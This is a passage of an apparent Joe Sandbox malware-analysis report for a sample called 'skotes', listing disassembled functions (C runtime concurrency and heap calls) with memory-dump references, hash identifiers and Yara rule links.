                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                              • String ID: iA
                                                                                                                                              • API String ID: 1182035702-1118743441
                                                                                                                                              • Opcode ID: 44bd3080b73c1477e3e77adc034eaf94d8acea1012cb4d9343d720ce2a986297
                                                                                                                                              • Instruction ID: dbfce4fa691d0a98bc3aa8749e6742a9d80362ff2df78e67c0c5db40cb0b6eee
                                                                                                                                              • Opcode Fuzzy Hash: 44bd3080b73c1477e3e77adc034eaf94d8acea1012cb4d9343d720ce2a986297
                                                                                                                                              • Instruction Fuzzy Hash: 1321F374C002099ADF24DFA6C4456EEB7F0FF14324F10052FE851A22C1E7B84AC6CB48
                                                                                                                                              Function 004278E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427903
                                                                                                                                                • Part of subcall function 00425CB8: __EH_prolog3_catch.LIBCMT ref: 00425CBF
                                                                                                                                                • Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425CF8
                                                                                                                                              • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0042792A
                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427936
                                                                                                                                                • Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425D70
                                                                                                                                                • Part of subcall function 00425CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425D7E
                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427982
                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 004279A3
                                                                                                                                              • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 004279AB
                                                                                                                                              • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004279BD
                                                                                                                                              • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 004279ED
                                                                                                                                                • Part of subcall function 0042691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426942
                                                                                                                                                • Part of subcall function 0042691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426965
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1475861073-0
                                                                                                                                              • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                              • Instruction ID: be26d28973ab40e19276e1e39a9ed43843e9869f42fe47dc141d3d43563d5587
                                                                                                                                              • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                              • Instruction Fuzzy Hash: 9F314670B083715AEF16AA7854927FF77B59F01304F4401ABD485D7342DA2C4D8AC3D9
                                                                                                                                              Function 00444C14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00444C98
                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00444D5E
                                                                                                                                              • __freea.LIBCMT ref: 00444DCA
                                                                                                                                                • Part of subcall function 0043B04B: RtlAllocateHeap.NTDLL(00000000,EBA58D57,?,?,0041D3FC,EBA58D57,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E
                                                                                                                                              • __freea.LIBCMT ref: 00444DD3
                                                                                                                                              • __freea.LIBCMT ref: 00444DF6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                              • String ID: ZC,mC
                                                                                                                                              • API String ID: 1423051803-3499607563
                                                                                                                                              • Opcode ID: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
                                                                                                                                              • Instruction ID: 3df8754f567642f5bc12b9c6ac1686bc91f11376b98a6e44c20c24ac8824f300
                                                                                                                                              • Opcode Fuzzy Hash: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
                                                                                                                                              • Instruction Fuzzy Hash: 1651D5B2A00216ABFB255F55DC81FBB36A9DFC4754F15012BFD0497251EB38DC1186A8
                                                                                                                                              Function 0042DD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0042DD91
                                                                                                                                              • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0042DDAE
                                                                                                                                              • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0042DE14
                                                                                                                                              • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0042DE29
                                                                                                                                              • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0042DE3B
                                                                                                                                              • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0042DE4B
                                                                                                                                              • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0042DE74
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2885714658-0
                                                                                                                                              • Opcode ID: 5ad63c1b420a2bf52cb8b3588fb72bc2c3132c889c9b7eb879e497c126c90066
                                                                                                                                              • Instruction ID: f1fabc8e0c887fbee8e2ec9558ce6889dd68099345497c82765e1d73775b2d10
